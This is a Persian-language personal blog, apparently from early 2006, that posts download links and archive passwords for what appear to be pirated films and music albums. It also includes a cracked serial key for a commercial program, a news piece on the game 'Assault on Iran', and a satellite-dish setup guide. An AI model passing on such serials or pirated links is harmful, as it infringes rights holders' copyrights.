هرچی بخاهید اینجا هست...یک سر بزن

کاملترين بانک اطلاعاتی کدهای تقلب در بازی های رايانه ای بصورت رايگان در دسترس قرار گرفت. اين نرم افزار باحجمی در حدود ده مگابايت دارای کدهای بيش از 4680 بازی تحت PC و 2500 بازی قابل اجرا تحت Console های گوناگون می‌باشد. دريافت فايل...


یهنی خیلی باحال می باشه


+ نوشته شده در  شنبه بیست و نهم بهمن ۱۳۸۴ساعت 10:5  توسط رضا | 

کارگردان: دارن لين بوسمن. فيلمنامه: دارن لين بوسمن، لي وانل. موسيقي: چارلي کلوزر. مدير فيلمبرداري: ديويد آرمسترانگ. تدوين: کوين گرتروت. طراح صحنه: ديويد هکل. بازيگران: داني والبرگ(اريک ماتيوز)، شاوني اسميت(آماندا)، توبين بل(جيگساو)، فرانکي جي(خاوير)، گلن پلامر(جونز)، دينا مه ير(کري)، امانويل وژيه(آديسون)، بورلي ميچل(لورا). 93 دقيقه. محصول 2005 آمريکا.

جيگساو قاتل سريالي قسمت اول فيلم اره که براي از ميان بردن قربانيان خود نقشه هايي نبوغ آميز و خوفناک طراحي کرده بود بار ديگر بازگشته تا ارزش زندگي را به قربانيان خود بفهماند. اين بار يک گروه هشت نفره براي فرار از مکاني دربسته از هوش و استعداد خود بهره بگيرند، البته قبل از اين که گاز اعصاب کشنده اي که جيگساو براي شان تدارک ديده آنها را از پاي درآورد. از سوي ديگر کارآگاه اريک متيوز سرنخ هايي از جيگساو به چنگ آورده و خود را در شرف دستگيري او مي داند. اما زماني که درمي يابد همه چيز از سوي جيگساو طراحي شده، ديگر براي هر کاري دير است، چون خود نيز يکي از قربانيان خود اوست و رهيدن از اين دام چندان کار ساده اي به نظر نمي رسد.

چرا بايد ديد؟
مشخص بود که فيلم ارٌه که در سال 2004 به رغم بودجه يک ميليون دلاري اش توانست 55 ميليون دلار نصيب سازندگانش کند ، تبديل به يک پديده شده و خيلي زود دنباله اي بر آن و صد البته برٌنده تر ساخته شود، تا اين معدن طلاي تازه کشف شده متروک نشود. مطابق روال ادامه سازي ها قسمت تازه از بودجه بيشتري – 4 ميليون دلار – برخوردار است که باز در مقايسه با محصولات معمولي هاليوود فيلمي مستقل و کم هزينه ارزيابي مي شود. اين تريلر خونين اين بار توسط کارگردان جوان و تازه کار ديگري ساخته شده و در اکران اوليه خود موفق شده تا اين لحظه بيش از 60 ميليون دلار روانه جيب تهيه کنندگانش سازد. (توضيحات از سايت roozonline.com)

براي دانلود به صورت DVDRip با حجم ۶۹۷ مگابايت مي توانيد از لينک زير استفاده کنيد.

توجه۱:
شايد تا ۳۰ روز ديگر لينک دانلود غير فعال شود پس بعد از اين چند روز لطفا هي ايميل نزنيد و بگوييد که چرا آدم را سرکار مي‌گذاريد....

توجه۲: پسوند فایل gz است که با winrar می‌توانيد باز كنيد

http://files.filefront.com/TrailerWOWgz/;4616490;;/fileinfo.html


دانلود فيلم Doom

Resized image حدود ۲سال است كه ۳ سي.دي بازي Doom را گرفته‌ام ولي هنوز وقت نكرده‌ام حتي پلمپ آن را باز كنم، هميشه و هر روز هم گفته‌ام بگذار فردا يا پس‌فردا يا يك روز تعطيل گير بياورم حداقل يكبار هم كه شده نصب كنم ولي اصلا فرصت نشده... بهرحال كماكان منتظر يك وقت اضافه هستم تا اين همه تعريف و تمجيد در مورد يك بازي را با چشم ببينيم... البته يادي از Doom قديم هم بكنيم. اين از بازي...

اما فيلم Doom كه قرار بود ۲۱ اكتبر روي پرده برود يا به قولي اكران شود ظاهرا با ۱ روز تاخير يعني شنبه اكران شد البته مثل اينكه فعلا طي اين ۳-۲ روز به صورت محدود در بعضي جاها شروع شده... به هرحال شده يا نشده را ما كار نداريم مهم اين است كه اينترنت محدوديت پحدوديت سرش نمي‌شود معلوم نيست چطور اينقدر زود شايد هم حتي زودتر از اكران عمومي برروي اينترنت اكران شد... آن هم با بيش از ۱۰هزاربار دانلود در طي يك يا دو روز... طوري كه تا آنجايي كه من اطلاع پيدا كردم يكي از سرورهاي بسيار قدرتمند سرويس فضاي مجاني مگاآپلود به كما رفت...

البته شخصي كه اين فيلم را گرفته بود و آپلود كرده بود ظاهرا دست‌بردار نبود يا نيست چون چند دفعه بعد از اين اتفاق، چندين بار آن را آپلود كرد يا كرده... به هر صورت هدف از اين پٌست فقط براي اين لينك‌ها براي دانلود فيلم بود:

http://www.megaupload.com/?d=UAMKX5BB
http://www.megaupload.com/?d=6JT0S9B2
http://www.megaupload.com/?d=O1G3RA3P
Password: http://www.xsharex.info

حجم آن ۵۰۰خورده‌اي مگابايت و با كيفيت نسبتا پايين (كه از طرف من اصلا تست نشده چون من اينجور فيلم‌ها را فقط كيفيت دي.وي.دي آن برايم مهم است...) هر چند عجله‌اي هم نيست برادارن كفار به ۱ ماه هم نكشيده آرزوي ما را به زودي بر آورده خواهند كرد و به زودي DVD آن هم خواهد رسيد.


فيلم‌ عروس مرده (Corpse Bride)

)


انيميشن عروس مرده (تيم برتون) اين روزها با اقبال بسيارى مواجه است. اين اثر نه تنها تحسين منتقدان را برانگيخت بلكه عنوان پرفروش ترين انيميشن به نمايش درآمده در ماه سپتامبر را نيز از آن خود كرد. فروش ۲۰ ميليون و ۱۰۰ دلارى اين اثر انيميشن به گونه اى بود كه تهيه كننده ها را به ساخت چنين انيميشن هاى پردردسرى ترغيب كرد. تيم برتون مدت زمان ۱۰ سال از عمر هنرى اش را صرف ساخت اين اثر كرد و براى خلق شخصيت هاى آن از مدل هاى رسى سود جست كه اين مسئله بسيار زمان بر بود. اين اثر براساس يك داستان قديمى ساخته شد و شرح حال مردى را روايت مى كند كه به دنياى زير زمينى مى رود تا با عروسى مرده ازدواج كند. اين در حالى است كه نامزد واقعى وى در دنياى زندگان منتظر اوست. بسيارى از كارشناسان سينما معتقد هستند كه اگر فيلم پرسروصداى برنامه پرواز اين هفته به نمايش در نمى آمد، عروس مرده همچنان نبض مخاطبان را در دست مى گرفت. با اين وجود تفاوت فروش ۴ ميليون و ۵۰۰ هزارى اين دو اثر نشان مى دهد كه همچنان مى توان به فروش واپسين ساخته تيم برتون اميدوار بود.

اگر هوس کردید این فیلم را ببینید این هم لینک برای دانلود:

http://www.megaupload.com/?d=5IX17S39
http://www.megaupload.com/?d=EHPJKW0Z
http://www.filefactory.com/get/f.php?f=241175bc52e63fe1ecd7ac06

برای باز کردن فایل فشرده نیاز به رمز عبور دارید پس ایمیل بزنید:
farstec[at]Gmail[dot]com


فيلم Crash

اين فيلم Crash رو حتما ببينيد. فيلم متفاوتى هست. بيشتر از ده تا شخصيت حضور دارند، هيچ کدوم بيشتر از ۵ دقيقه نقش ندارند، هر چند از اول تا آخر داستان همه هستند. قهرمانى وجود نداره، آدم بدى وجود نداره، تقريبا هيچ کس کاملا مثبت نيست. هرچند همه آدم‌هاى خوبى هستند که تحت شرايط زندگى کارها و عکس‌العمل‌هاى خاصى ازشون سر ميزنه. مثبت‌ترين آدم، شايد بدترين اتفاق فيلم رو موجب ميشه و اونى که همش پى شر مى‌گرده، بهترين کار رو تو فيلم انجام ميده.
شايد مجموعه اتفاق‌ها اغراق‌آميز به نظر بياد، ولى همه حوادث خيلى طبيعى هست.
به نظر من فيلم خيلى خوش‌ساختى هست، چند دقيقه طول کشيد تا به فضاى فيلم عادت کنم، ولى تا دقيقه آخر فيلم همه صحنه‌ها جذاب بود، شايد دوست داشتم که حتى ادامه پيدا کنه و مى‌تونست ادامه پيدا کنه، ولى يه جايى بايد تموم ميشد ديگه.
من تعجب نمى‌کنم اگه فيلمنامه چند تا جايزه ببره، نقش و بازى‌ها و ارتباط اونها انقدر خوب پياده شده که علارغم مدت کوتاه هر کدوم، راحت ميشه اتفاق‌ها و زمينه هر پيش‌آمدى رو فهميد.

پ.ن:  نکته جالب اينکه ۳ نفر ايراني هم توي اين فيلم بازي مي‌کنند که خيلي جالب هم بازی می کردند بعضي از قسمت‌ها رو به فارسي حرف مي‌زدند مثلا: مرتيکه بي‌شعور... اين چي‌ميگه؟... بابا ولش کن مزخرف ميگه... من که تا حالا تفنگ نخريدم... چه ميدونم... کٌرخر...

اگر این فیلم را ندیدید یا اینکه ندارید این امکان هست که می توانید از اینجا با کیفیت تقریبا دی.وی.دی دانلود کنید(اینجا کلیک کنید...)


فیلم Stealth

Stealth



فیلم Stealth
Part 1 , Part 2 , Part 3
Password: killurself

این یکی: password: zyrromovie
و این یکی را هم تست کنید: password: www.30im.com

[شرمنده که تست نشده] اگر جواب داد، خبر کنید ممنون میشوم.


دانلود فیلمهای ايرانی سربازان جمعه و سگ کشی با کیفیت بالا

» سربازهاي جمعه 

اين فيلم داستان چند سرباز است كه يك روز جمعه به همراه گروهبان خود به شهر مي آيند. اين روز تعطيل اما براي آنها حوادثي تازه در پي دارد و آنها را به نگاهي ديگر مي رساند.]
 

:: دانــــــــــــلــــــــــــــــــــــــود ::     Size : 742 Mb



» سگ کشی
[يك بانوي نويسنده ايراني به نام گلرخ كمالي، كه سال گذشته شوهرش، ناصر معاصر را به حال قهر و به گمان رابطه اي ميان او و منشي شركتش ترك كرده بود، با پايان جنگ به تهران برمي گردد و شوهرش را مي بيند كه ورشكست شده و در حال رفتن به زندان است. گلرخ متوجه مي شود كه شريك شوهرش با صحنه سازي، تمامي سرمايه ي شركت را برداشته و به طور غير قانوني از مرز خارج شده ادامه...]


:: دانــــــــــــلــــــــــــــــــــــــود  سی.دی ۱::     Size : 776 Mb
:: دانــــــــــــلــــــــــــــــــــــــود سی.دی ۲ ::      Size : 684 M


برو بشین حال کن


+ نوشته شده در  شنبه بیست و نهم بهمن ۱۳۸۴ساعت 10:1  توسط رضا | 
Google Video Player

 

حجم: ۵/۴ مگابايت          Gvi       *.Gvp.*

براي دانلود از اينجا: http://dl.google.com/videoplayer/GoogleVideoPlayerSetup.exe


Homepage: http://www.easywebaction.com
Download: http://www.easywebaction.com/download/easySave-AllInOne-1.0.0.exe
Name: iNFECTED
Serial: MRAQ-UUDN-DYKK-MSWT



 

+ نوشته شده در  شنبه بیست و نهم بهمن ۱۳۸۴ساعت 9:52  توسط رضا | 

اين هم يك برنامه خوب براي اجرا فايلهاي تصويري و ... اين برنامه مي تونه تمام فايلهايي را كه ويندوز مديا پلير اجرا مي كند را اجرا كنه . تنها و بهترين خوبي اين برنامه اين هست كه شما مي توانيد در حين  نگاه كردن به فيلم با كمترين افت گرافيك چند برابر فيلم را زوم كنيد .


 


لینک دانلود فایل | حجم :2.3 مگابایت   


+ نوشته شده در  شنبه بیست و نهم بهمن ۱۳۸۴ساعت 9:43  توسط رضا | 

حتما می گویید عالیی

+ نوشته شده در  شنبه بیست و نهم بهمن ۱۳۸۴ساعت 9:27  توسط رضا | 
 

عکسهای عروسی علی دایی

Preview
Free Image Hosting - www.supload.com
Preview
Free Image Hosting - www.supload.com
Preview
Free Image Hosting - www.supload.com


+ نوشته شده در  پنجشنبه بیست و هفتم بهمن ۱۳۸۴ساعت 16:38  توسط رضا | 
بازی رايانه ای "حمله به ايران": شبيه سازی واقعيت محتمل
 

 
 
صحنه ای از بازی
کاربران ايرانی، توماری اينترنتی در انتقاد از بازی "حمله به ایران" تهيه کرده اند
در ماه های اخير بازی رايانه ای "حمله به ايران" (Assault on Iran) موضوع بحث بسياری از رسانه های فارسی زبان در داخل و خارج از کشور قرار گرفته است.

روزنامه کيهان در واکنشی نسبت به انتشار اين بازی اينترنتی نوشته است: "آمريکايی ها خيلی دلشان می خواهد به ايران حمله کنند؛ اما بايد دلشان را به چنين بازی هايی خوش کنند."

در همين حال در داخل و خارج از ايران نيز بسياری از ايرانيان فارغ از موضع گيری در برابر حکومت، نسبت به محتوای اين بازی اعتراض کردند؛ از جمله توماری اينترنتی در اعتراض به شرکت سازنده بازی با بيش از پنج هزار امضا منتشر شد.

"حمله به ايران"، در واقع يکی از ماموريتهای متعدد بازی کوما وار (Kuma War) است. اين بازی جنگی و ماموريتهای مختلف آن که هر ماه به تعدادشان افزوده می شود، به صورت رايگان از اينترنت قابل دريافت است.

شرکت کوما - ريالتی گيمز (Kuma Reality Games) هدف خود را ساخت بازيهای رايانه ای بر اساس رويدادهای "واقعی" و موضوعهای خبری عنوان کرده است.

موج ساز يا موج سوار؟

کيت هالپر، مدير شرکت کوما ريالتی گيمز در گفتگويی با بخش فارسی بی بی سی تاکيد کرد: "ما تلاش می کنيم که به عنوان يک رسانه تصويری همزمان با اخبار پيش برويم. وقتی مخاطب هرروزه اخباری را در تلويزيون يا روزنامه ها می بيند اين يک فرصت استثنايی برای ما است که ما هم تعامل او را با يک بازی درباره همان موضوع جلب کنيم."

بيشتر ماموريتهای اين سری از بازيها در عراق و افغانستان می گذرند و نيروهای شرکت کننده در عمليات عبارتند از: کلاه سبزها، نيروهای ويژه عمليات شبانه، نيروهای ويژه کماندويی اسرائيل، هنگ هفتاد و پنجم رنجرها، نيروهای ويژه دلتا فورس، نيروی دريايی آمريکا، نيروهای واکنش سريع وکماندوهای چترباز بريتانيا.

تازه ترين ماموريت "کوما وار" به بازسازی "شکار صدام" يا کشف مخفيگاه رهبر پيشين عراق در دسامبر ۲۰۰۳ می پردازد.

اما ماموريت "حمله به ايران" که به گفته مدير شرکت کوما ريالتی گيمز، تاکنون ده هزار بار دريافت شده، يکی از جنجال برانگيزترين ماموريتهای اين مجموعه شده و دستکم درميان کاربران فارسی زبان، شهرتی فراتر از کل سری بازيها يافته است.

صحنه ای از بازی
 وقتی مخاطب هرروزه اخباری را در تلويزيون يا روزنامه ها می بيند اين يک فرصت استثنايی برای ما است که ما هم تعامل او را با يک بازی درباره همان موضوع جلب کنيم
 
کيت هالپر، مدير شرکت کوما ريالتی گيمز

مدير شرکت کوما گفت که از ۶۲ ماموريتی که تا به حال طراحی و عرضه شده، تنها قسمت بيست و چهارم اين بازی که به بازسازی ماموريت پرسروصدای جان کری، نامزد دموکرات رياست جمهوری آمريکا در دوران جنگ ويتنام می پرداخت، بيش از اين مورد توجه کاربران قرار گرفته و جنجال برانگيخته است.

ماموريت: آزادی دانشمند

طراحان بازی "کوما وار" پيش از اين نيز دو بار ايران را صحنه عمليات قرار داده اند و در دو قسمت با عنوان "نجات گروگانهای آمريکايی" به بازسازی عمليات شکست خورده نيروهای ويژه آمريکا برای نجات گروگانها در سال ۱۳۵۹ پرداخته اند اما اين دو قسمت هرگز به اندازه ماموريتی که در نطنز می گذرد، پرسروصدا نشد.

+ نوشته شده در  پنجشنبه بیست و هفتم بهمن ۱۳۸۴ساعت 16:23  توسط رضا | 
موضوع: ماهواره   تعداد بازدید: 1787



mkon's SarCalc
 « نرم افزار جهت يابي ماهواره و تنظيم ديش »
این نرم افزار به شما کمک میکند تا با دادن موقعيت مكاني خود شامل كشور و شهري كه در آن قرار داريد، موقعيت مكاني 140 ماهواره موجود خارج از جو زمين را محاسبه كرده و به شما جهت دقيق آنها را نشان مي دهد . از اين نرم افزار براي تنظيم يك ديش براي دريافت فركانسهاي يك ماهواره استفاده مي شود . شما با داشتن اين نرم افزار و يك ست فايندر كه وسيله اي براي اندازه گيري شدت و قوت فركانس دريافتي است مي توانيد خودتان ديش خود را در هر مسيري كه مي خواهيد تنظيم نماييد. روش كار به اين صورت است كه بعد از نصب نرم افزار موقعيت مكاني خود را به mkon's SarCalc مي دهيد و ماهواره مورد نظر خود را كه قصد تنظيم ديش براي دريافت فركانسهاي آن داريد را در ليست محاسبه شده توسط اين نرم افزار انتخاب مي كنيد و با ديدن جزئيات مسير دقيق قرار گيري ديش شامل آزيموت و فراز و ساعت ال ان بي جهتي كه بايد ديش را تنظيم كنيد مشاهده مي كنيد. همچنين با اين نرم افزار مي توانيد مقدار فاصله مناسب ديش از يك مانع را با دادن ارتفاع مانع محاسبه كنيد.



تصوير جزئيات محاسبه شده براي ماهواره هات برد در تهران


نحوه كار با فايندر:
در منوی نصب ريسیور يا كارت دي وي بي گزينه جستجوي دستي را انتخاب كنيد و ماهواره و فرکانسي قصد داريد ديش را در مسيرش تنظيم كنيد در آن وارد كنيد. سعي كنيد براي اينكار به دليل بالا رفتن دقت در ولتاژ 18v قطبيت H از فركانسهاي نمونه كه قطبيت آنها افقي يا همان Horizontal است استفاده كنيد . به سراغ ديش و ال ان بي رفته و ال ان بي را در فاصله كانوني ديش كه برابر است با فاصله سر ال ان بي از عمق ديش به اندازه قطر ديش به توان 2 ( فاصله كانوني = اندازه قطر ديش به توان 2 ) نصب كنيد. سپس فايندر را در مسير ريسيور و ال ان بي قرار دهيد به اين صورت كه قسمتي كه روي فايندر نوشته شده to LNB به به ال ان بي و سر ديگر فايندر را به كابل اصلي كه به ريسور متصل است ببنديد .توجه داشته باشيد در صورتي كه كابلها را جابجا وصل كنيد احتمال خرابي فايندر وجود دارد. همچنين اگر در مسير ال ان بي و ريسور از سوئيچ استفاده شده سوئيچ را از مسير بين ال ان بي و ريسيور خارج كنيد و قطعه ديگري غير از فايندر در اين مسير قرار نداشته باشد. در قدم بعدي ساعت ال ان بي خود را تنظيم كنيد يعني با چرخاندن ال ان بي نشانه مثلثي كنار ال ان بي را در وضعيتي كه به آن Skew يا ساعت ال ان بي مي گويند تنظيم كنيد كه براي نمونه Skew براي ماهواره HotBrid در تهران 40/89 درجه يا همان ساعت 11 است. بعد از اينكار با چرخاندن ولومي كه روي فايندر قرار دارد عقربه نشانگر را روي عدد 5 يا 6 قرار دهيد سپس ديش را در جهت افقي مورد نظر بصورت تقريبي قرار دهيد و با جابجايي افقي سعي كنيد كه با دريافت دقيق تر فركانس ها در جهت مناسب عقربه نشانگر فايندر به سمت عدد 10 برود . هر كجا عقربه نشانگر فايندر به عدد 10 رسيد با ولوم فايندر عقربه را روي 6 تا 7 بياوريد بعد از اينكه جهت افقي را بصورت حدودي به دست آورديد، كمي پايه ديش خود را محكم كنيد و سپس ديش خود را در مسير عمودي يا فراز يا همان Elevation تقريبي قرار دهيد و باز هم با بالا و پايين بردن سر ديش سعي كنيد با كمك فايندر سعي در بهتر كردن شدت فركانس كنيد. بايد اينقدر اين مراحل را انجام دهيد تا ديگر عقربه نشانگر فايندر به سمت عدد بالاتر نرود.





توجه داشته باشيد اين كار كمي نياز به تجربه دارد و ممكن است براي بار اول كمي براي شما مشكل باشد. براي تنظيم ديش مي توانيد تلويزيون و ريسيور را به كنار ديش ببريد ولي اين كار با فايندر دقيق تر و سريعتر انجام مي شود. قيمت يك فايندر آنالوگ در حدود 10 تا 13 هزار تومان است .


Download دانلود - 1.57 مگابایت

+ نوشته شده در  پنجشنبه بیست و هفتم بهمن ۱۳۸۴ساعت 16:18  توسط رضا | 

 

+ نوشته شده در  شنبه بیست و دوم بهمن ۱۳۸۴ساعت 17:33  توسط رضا | 
دوستان زیادی درخواست قالبی برای بازی داشتند که بالاخره آماده شد.

قالب کانتر استریک

توضیحات: چون مطلب مربوط به بازیه قالب رو گرافیکی انتخاب کردم، البته عکساش کار خودم نیست وکار یه سایت فری تمپلت هست که امیدوارم به کارتون بیاد. دوستان قالبهایی در مورد فوتبال، مذهبی، عاشقانه و ... خواسته بودند، که اگه وقت بکنم حتما درست میکنم.  

مشاهده قالب   دريافت قالب


قالب محرم ، ويژه ايام محرم. اين ايام رو به تمام دوستان تسليت عرض مي کنم.

قالب محرم

توضيحات: براي ساختن اين قالب وقت کمي داشتم ، چون مي خواستم سريعتر بزارمش واسه استفاده  اميدوارم نتيجه اش راضيتون کرده باشه. اين دو تا قالب رو به خاطر مناسبتهايي که داشتن گذاشتم وگرنه قالبهايي که قولشون رو داده بودم فراموش نکردم و به زودي ميزارمشون تو وبلاگ. علي يارتون! 

مشاهده قالب   دريافت قالب


+ نوشته شده در  شنبه بیست و دوم بهمن ۱۳۸۴ساعت 17:9  توسط رضا | 
ازقسمت های دی ۸۴ و بهمن ۸۴

استفاده کنید مطالبه جالبی دارن


+ نوشته شده در  شنبه بیست و دوم بهمن ۱۳۸۴ساعت 16:50  توسط رضا | 

دوستان اين هم يك نرم افزار جالب براي فارسي كردن كامل برنامه Windows Media Player هست.اگر استفاده كردين و حال هم كردين سعي كنين يه نظرهم بدين.دانلودش تو ادامه مطلب.

فارسي ساز

حجم: 2.3 مگابایت
دريافت: دانلود


+ نوشته شده در  شنبه بیست و دوم بهمن ۱۳۸۴ساعت 16:47  توسط رضا | 
 
 
السلام اليك ياابا عبدالله الحسين
 
یاحسین
+ نوشته شده در  شنبه بیست و دوم بهمن ۱۳۸۴ساعت 16:41  توسط رضا | 


آلبوم جدید   " مونا "  قاته قاتم

 1. شب پیوند
 2. برو برو
 3. نقطه چین
 4. دل من
 5. مادر
 6. قاته قاتم
 7. وطن
 8. ASIK OLDUM

جدیدترین کار هیچکس  " تو مستی "

WWW.FARZAD-MUSIC.CO.SR

هیچکس و ابلیس با همخوانی انزو - تو مستی


یک آهنگ زیبا از  " اسماعیل اسفندیاری " به همراه دو دمو

WWW.FARZAD-MUSIC.CO.SR

آهنگ گل مریم ( کامل )

آب و نون ( دمو )

سکوت مرداب ( دمو )


 نوحه قشنگ از   ( دی جی مذهبی )        < Track 1 >     < Track 2 >     < Track 3 >


یک آهنگ جدید و قشنگ از " فرزاد فرزین به همراهی دی جی مریم "

 

دانلود با کیفیت ۱۲۸

دانلود با کیفیت ۲۴


 موزیک ویدیو "شهاب تیام"  دختر کابلی  به درخواست یکی از دوستان

 

DOWNLOAD


موزیک ویدیو جدید شادمهر    " بیا بیا اینجا "    خیلی قشنگه 

WWW.FARZAD-MUSIC.CO.SR

DOWNLOAD


آلبوم جدید طوفان     " TANGO "

WWW.FARZAD-FN.BLOGFA.COM

 1. Tango
 2. Telephone
 3. Tou Bego Dele Man
 4. Man Takam Allah
 5. Tou Biya Yadam Bede
 6. Asheghetam Dobareh
 7. Ajab Halie Emshab
 8. Yashar

 آلبوم هومن بختیاری   :: دروغ چرا ::

WWW.FARZAD-FN.BLOGFA.COM

Download 128 Kbps Full Album Zip (Click Here) 51.1 Mb

Download 24 Kbps Full Album Zip (Click Here) 9.58 Mb   

                          


آلبوم جدید    :: علی لهراسبی ::

 1. حس غریب
 2. کار من و دل
 3. دریایی ها
 4. ترانه ساز
 5. حرف آخر
 6. تنها میرم
 7. عسل خاتون
 8. بی طاقت
 9. ریمیکس


این هم آلبوم  " کیارش " که یکی از دوستان درخواست کرده بود

WWW.FARZAD-FN.BLOGFA.COM

 1. لباس مشکی
 2. حسرت
 3. بهترین ترانه
 4. به من چه
 5. قصه ی فردا
 6. فقط میگی چشم
 7. فکر میکردم نمیشه


             پسورد آلبوم های بالا :     Password For Unzip : www.justmp3.tk

+ نوشته شده توسط فرزاد در دوشنبه بيست و ششم دي 1384 و ساعت 1:53 بعد از ظهر | 2 نظر
۴ تا دمو از آلبوم جدید    "بیژن مرتضوی"

WWW.FARZAD-FN.BLOGFA.COM

TRACK 1 بی کلام

TRACK 2

TRACK 3

TRACK 4


         با عرض شرمندگی آلبوم  :: محسن چاووشی :: رو برداشتم


          ":: یک سری موزیک و موزیک ویدیو جدید و درخواستی ::"

 

آهنگی از دی جی مسیحا 10SCOND

محسن چاووشی آهنگ روسی ( دمو )

آهنگ جدید HUNG UP ) MADONNA )

آهنگ جدید ( حامد هاکان ) لوتی دست خوش

آهنگ جدید و قشنگ DJ MASIHA

آهنگی از ( JEFF AUSTIN BLACK )

آهنگ جدید ( EMINEM - WHEN IM GONE )

آهنگ جدید ( DJ YAHELL - SUPER SET )

آهنگ جدید (حبیب و محمد) بارون

آهنگ جدید آمو (دستها بالا)

موزیک ویدیو جدید از (باران) قدیس

این هم ۲ تا میکس قشنگ از  < دی جی پی شی >        DJ PISHI           DJ MIX

این هم ۱ موزیک از  مجید رئییسی

آهنگ جدید و قشنگ  (دی جی مسیحا)  DJ MASIHA 

 این هم یک موزیک باحال محسن چاووشی

1موزیک دیگه از محسن چاووشی (میمیرم برات)

موزیک ویدیو جدید ( کیا ) HEYFE TO BUD

موزیک ویدیو جدید (مسعود فرد منش) MIKHAMET

قسمت دوم مصاحبه (کامران و هومن) TAPESH TV

یک آهنگ خیلی قشنگ از ( شهرام ) لی لی کو

یک آهنگ از (( گریه بچه)) که خیلی باحاله کاری از DJ MOSY 

حمیدرضا پیروزنیا (شبهای شیشهای )

۲تا موزیک جدید از  ( مجید اخشابی )        <  مسافر کویر    >        < رویا >

1 موزیک جدید از ( DJ DAVOD ) به صورت دمو

1 موزیک جدید از ملیسا ( بطری و دریا )

2 میکس جدید از  ( منصور )          < TRACK 1 >      < TRACK 2 >

آهنگ جدید ( حامد هاکان ) برو سفر سلامت به صورت دمو 

1 کلیپ بسیار زیبا و جالب از گروه ( راش )


آلبوم جدید کیوان تافته     "مارک عاشقی"

WWW.FARZAD-FN.BLOGFA.COM

 1. آفتابی
 2. بخاطره چشمات
 3. قول و قرار
 4. خاطره
 5. مارک عاشقی
 6. راهه برگشت
 7. شاگل
 8. یه ترانه
 9. شاگل ( بی کلام )


آلبوم جدید مهدی زکی زاده   " تو منو دعوت کن "

 1. دوات
 2. سرابه آرزو
 3. ستاره عشق
 4. نگو نه
 5. دوات ( دکلمه )
 6. تلسمه تو
 7. دنیا
 8. بی قرار


آلبوم جدید    :: DJ SAMI  ::
 1. TRACK 1
 2. TRACK 2
 3. TRACK 3
 4. TRACK 4
 5. TRACK 5
 6. TRACK 6
 7. TRACK 7
 8. TRACK 8


پشت صحنه موزیک ویدیو جدید ::شهیاد و امراه::  بی تو هرگز

WWW.FARZAD-FN.BLOGFA.COM

DOWNLOAD


بهترین و جدیدترین کارهای   ::دی جی رامین::    DJ RAMIN

WWW.FARZAD-FN.BLOGFA.COM

 1. INTRO
 2. Hot Persian Mix
 3. Siavash Shams- Yavash Yavash
 4. Siavash Ghomayshi - Farda
 5. Hamed Hakan - Shahde Masmoum
 6. Sandy - Mashala
 7. Afshin feat Kamran & Hooman - Senyorita Im in Love
 8. Shadmer Aghili feat Hamed Hakan - Jina,Donya
 9. Siavash Ghomayshi - Hanouz
 10. Shadmehr Aghili - Aghoush
 11. Michael Jackson - Smooth Criminal
 12. Usher - Yeah
 13. No Mercy - Where Do You Go
 14. Maroon 5 feat Beyonce - This Naughty Love
 15. Pitbull and Nina Sky, and Crazy Frog Mega
 16. Gwen Stefani - Rich Girl
 17. Benyamin - Donya Mese To Nadareh ( جدید )


بهترین آهنگهای رقص ایرانی مخصوص پارتی و تولد  ::DJ PARSIAN ::

WWW.FARZAD-FN.BLOGFA.COM

کیفیت عالی ( 192Kb ) و حجم حدود 54 مگابایت


این هم ۴ تا موزیک از فیلم گل یخ با صدای   :: حامی ::

WWW.FARZAD-FN.BLOGFA.COM

 1. TRACK 1
 2. TRACK 2
 3. TRACK 3
 4. TRACK 4


این هم یک آلبوم بندری از    >> امیرمیرشکاری <<

WWW.FARZAD-FN.BLOGFA.COM

 1. شاد باش
 2. چیش انتظار
 3. رویا
 4. بی وفا
 5. بهار بوشهر
 6. بی قرار
 7. یار مهربون
 8. پیشکش


چند تا موزیک جدید از   < محسن یگانه،محسن چاووشی و حامد هاکان >

WWW.FARZAD-FN.BLOGFA.COM

 1. محسن یگانه - چی بگم   ( نسخه رمیکس شده )
 2. محسن یگانه - گل هیاهو    ( نسخه با کیفیت اصلی )
 3. محسن یگانه - جمعه   ( نسخه کیفیت بالا )
 4. محسن یگانه - خیال  ( نسخه کیفیت اصلی و تکمیل شده )
 5. محسن یگانه - هنوز  ( نسخه با کیفیت بالا و کامل ) جدید
 6. محسن یگانه و فریدون - خوشگل عاشق  ( میکس توسط دی جی سینا ) جدید


آلبوم آهنگهای   :: عاشقانه LOVE SONGS ::

WWW.FARZAD-FN.BLOGFA.COM

 1. دی جی الهه - ای وای خدا
 2. امزیپر - حیف واژه خیانت
 3. هادی پاکزاد - مرا می بینی
 4. افشین سپهر - گلکم
 5. حامد هاکان - نپیچون ما رو دیگه
 6. قیصر - التماس
 7. ناصر عبدللهی - هوای هوا
 8. مهدی مقدم - شب شد
 9. محمد قاضی زاده - دیگه دوست ندارم
 10. گروه پارت - نانی
 11. سعید شهروز - راز
 12. سیروان خسروی - بارون
 13. طوفان کرمی - باران
 14. وحید حاجی تبار - مسافرت
 15. دی جی سها - من


آلبوم جدید    >> CRAZY FROG <<        لینک ۱۰۰٪ سالم

 1. TRACK 1
 2. TRACK 2
 3. TRACK 3
 4. TRACK 4
 5. TRACK 5
 6. TRACK 6
 7. TRACK 7
 8. TRACK 8
 9. TRACK 9
 10. TRACK 10


آلبوم جدید     ::مهدی رضوان::

 1. شب زادگان
 2. سرزمین کودکی
 3. بی کلام
 4. پنجره
 5. کوچه های مهتاب
 6. غزال آلایه عاشق
 7. قاصدک
 8. شوق زیارت
 9. آواز عشق
 10. بی کلام 2


دوستان این آلبوم هایی که گذاشتم تو هیچ وبلاگی نیست مگر اینکه از من

بر داشته باشن . چون خودم دیده بودم تو هیچ وبلاگی نیست ولی الان

شاید یک سری دزد برداشته باشن .

+ نوشته شده توسط فرزاد در دوشنبه نوزدهم دي 1384 و ساعت 11:56 قبل از ظهر | 32 نظر

             >> یک سری موزیک ، موزیک ویدیو  و آلبوم جدید <<

 

موزیک ویدیو  بی تو هرگز  ::شهياد و امراه::

شهیاد و امراه


موزیک ویدیو  دختر کابلی ::شهاب تیام::

شهاب تیام


موزیک ویدیو جدید  ::جمشید::

جمشید


موزیک ویدیو عاشق زری  ::قیصر::

قیصر


موزیک ویدیو جدید نیما  ::برو دیگه::

نیما


موزیک ویدیو غربت   ::پارسا::

پارسا


موزیک ویدیو پاک باخته   ::علی دانیال::

علی دانیال


موزیک ویدیو شهره  ::بارون::

شهره


موزیک ویدیو کامران دلان  ::فراری::

کامران دلان



آلبوم جدید نامی  ( Dynasty )

WWW.FARZAD-FN.BLOGFA.COM

 1. دماوند
 2. شهر آرزوهام
 3. مستم - مستم
